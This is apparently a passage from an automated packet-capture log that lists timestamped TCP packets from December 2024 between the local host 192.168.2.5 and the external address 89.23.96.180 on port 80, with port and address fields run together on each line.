                                                              Dec 21, 2024 10:47:33.170198917 CET804974389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:33.170326948 CET4974380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:33.170469046 CET4974380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:33.282051086 CET804973789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:33.290086031 CET804974389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:33.385147095 CET804973789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:33.385247946 CET4973780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:33.389199018 CET4974480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:33.508709908 CET804974489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:33.508831978 CET4974480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:33.509001970 CET4974480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:33.518145084 CET4974380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:33.629268885 CET804974489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:33.638541937 CET804974389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:33.638572931 CET804974389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:33.861929893 CET4974480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:33.983127117 CET804974489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:33.983138084 CET804974489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:33.983148098 CET804974489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:34.548418999 CET804974389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:34.596210003 CET4974380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:34.782004118 CET804974389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:34.893131018 CET4974380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:34.894548893 CET804974489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:34.971452951 CET4974480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:35.126171112 CET804974489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:35.268208981 CET4974480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.715907097 CET4974380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.716269016 CET4974480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.716759920 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.837260008 CET804974389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:36.837328911 CET4974380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.837678909 CET804974489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:36.837739944 CET4974480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.837801933 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:36.837872028 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.838028908 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:36.957425117 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:37.190109015 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:37.309979916 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:37.309992075 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:37.310139894 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:38.213110924 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:38.393127918 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.446055889 CET804975289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:38.580589056 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.588006020 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.628973961 CET4975280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.708499908 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:38.708722115 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.708815098 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:38.828463078 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.065128088 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.184789896 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.184803009 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.184813023 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.784557104 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.784648895 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.904303074 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.904398918 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.904436111 CET804975889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:39.904503107 CET4975880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.904587984 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:39.929490089 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:40.024250031 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.049058914 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.050647974 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:40.050755024 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:40.170450926 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.252794027 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:40.372423887 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.372636080 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.408865929 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:40.529093027 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.529103041 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:40.529112101 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.281209946 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.432554007 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.447612047 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.514288902 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.564980030 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.580627918 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.669713974 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.807955027 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.808023930 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.808324099 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.929039955 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.929120064 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.929284096 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.929454088 CET804976189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.929514885 CET4976180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:41.930057049 CET804976289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:41.930109024 CET4976280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:42.049983025 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:42.283967018 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:42.404448032 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:42.404480934 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:42.404490948 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:43.308073997 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:43.471241951 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:43.542351961 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:43.659013033 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.265361071 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.265623093 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.385169983 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:44.385253906 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.385257959 CET804976889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:44.385399103 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.385437965 CET4976880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.505048037 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:44.737086058 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:44.856947899 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:44.856988907 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:44.857172966 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:45.765592098 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:45.893124104 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:45.950975895 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.001621008 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.070662022 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.072890997 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.073050976 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.096230030 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.171283960 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.171642065 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.192684889 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.291286945 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.291380882 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.291399956 CET804977489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.291482925 CET4977480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.291668892 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.411472082 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.424586058 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.545228958 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545270920 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545327902 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545357943 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545386076 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545413971 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545464039 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545492887 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545506001 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.545520067 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545555115 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.545655966 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.643245935 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.665524960 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.665543079 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.665558100 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.665596008 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.665605068 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.665638924 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.665723085 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.709913015 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.710148096 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.763070107 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.763161898 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.763194084 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.829957008 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.830816984 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.877943993 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:46.878022909 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:46.994146109 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.082005978 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.082581997 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:47.110837936 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.111021996 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:47.202265024 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.230796099 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.230839014 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.230914116 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.230942965 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.230993032 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231020927 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231070042 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231096029 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231144905 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231194019 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.231304884 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.232642889 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235481024 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235512972 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235543966 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235572100 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235620022 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235649109 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235675097 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.235721111 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.459249020 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.502485991 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:47.667426109 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.721240997 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:47.906095028 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:47.945528984 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.031230927 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.031558990 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.051790953 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.053524971 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.151644945 CET804977989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.151684046 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.151706934 CET4977980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.151765108 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.151933908 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.173188925 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.272264957 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.408900976 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.502629042 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.514823914 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.528678894 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.528805017 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.565042973 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:48.622957945 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.622972965 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:48.623112917 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:49.070000887 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:49.111879110 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:49.538532972 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:49.580662966 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:49.774282932 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:49.815047026 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:49.890454054 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:49.890463114 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:49.890789032 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.010396957 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.010610104 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.010611057 CET804978589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.010682106 CET4978580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.010797024 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.011054993 CET804977889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.014590979 CET4977880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.130450964 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.362039089 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:50.481741905 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.481815100 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:50.481844902 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:51.387914896 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:51.440031052 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:51.625848055 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:51.674370050 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:51.749108076 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:51.868838072 CET804979789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:51.868942022 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:51.869127989 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:51.988972902 CET804979789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:52.221350908 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:52.341181993 CET804979789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:52.341233015 CET804979789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:52.341284990 CET804979789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:53.246582985 CET804979789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:53.299372911 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:53.481827021 CET804979789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:53.533761978 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:53.609453917 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:53.609591007 CET4980380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:53.729782104 CET804980389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:53.729881048 CET4980380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:53.730009079 CET804979789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:53.730068922 CET4979780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:53.730128050 CET4980380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:53.849745989 CET804980389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.080955029 CET4980380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:54.081501007 CET4980380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:54.081706047 CET4980480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:54.200900078 CET804980389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.200920105 CET804980389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.200936079 CET804980389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.201426983 CET804980489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.201618910 CET4980480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:54.204754114 CET4980480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:54.213202953 CET4980580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:54.242120028 CET804980389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.324377060 CET804980489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.332771063 CET804980589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.332956076 CET4980580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:54.333041906 CET4980580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:54.452657938 CET804980589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.549540997 CET4980480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:54.669327974 CET804980489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.669370890 CET804980489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.690097094 CET4980580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:54.768532991 CET804980389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.768702984 CET4980380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:54.809812069 CET804980589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.809834957 CET804980589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:54.809848070 CET804980589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:55.581733942 CET804980489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:55.627640963 CET4980480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:55.708646059 CET804980589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:55.752509117 CET4980580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:55.816329956 CET804980489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:55.861984015 CET4980480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:55.942177057 CET804980589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:55.987018108 CET4980580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:56.064800024 CET4980480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:56.064918995 CET4980580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:56.065293074 CET4981180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:56.185065985 CET804980489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:56.185113907 CET804981189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:56.185260057 CET4981180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:56.185262918 CET4980480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:56.185380936 CET4981180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:56.185482979 CET804980589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:56.185545921 CET4980580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:56.305144072 CET804981189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:56.534126997 CET4981180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:56.654097080 CET804981189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:56.654133081 CET804981189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:56.654165030 CET804981189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:57.562369108 CET804981189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:57.612021923 CET4981180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:57.801831961 CET804981189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:57.846268892 CET4981180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:57.923053980 CET4981680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:58.042881966 CET804981689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:58.042975903 CET4981680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:58.043170929 CET4981680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:58.162992001 CET804981689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:58.393548012 CET4981680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:58.516082048 CET804981689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:58.516117096 CET804981689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:58.516145945 CET804981689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:59.420309067 CET804981689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:59.471379042 CET4981680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:59.658010960 CET804981689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:59.705121040 CET4981680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:59.794600964 CET4981680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:59.795042992 CET4981980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:59.914752007 CET804981689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:59.914793015 CET804981989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:59.914820910 CET4981680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:59.914875984 CET4981980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:59.915047884 CET4981980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:00.034629107 CET804981989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:00.277800083 CET4981980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:00.398194075 CET804981989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:00.398227930 CET804981989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:00.398257017 CET804981989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:00.831815958 CET4981980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:00.832029104 CET4982480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:00.951574087 CET804982489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:00.951651096 CET4982480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:00.951683044 CET804981989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:00.951767921 CET4981980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:00.951884985 CET4982480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:00.954826117 CET4982580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:01.071706057 CET804982489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:01.074502945 CET804982589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:01.074588060 CET4982580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:01.074760914 CET4982580192.168.2.589.23.96.180
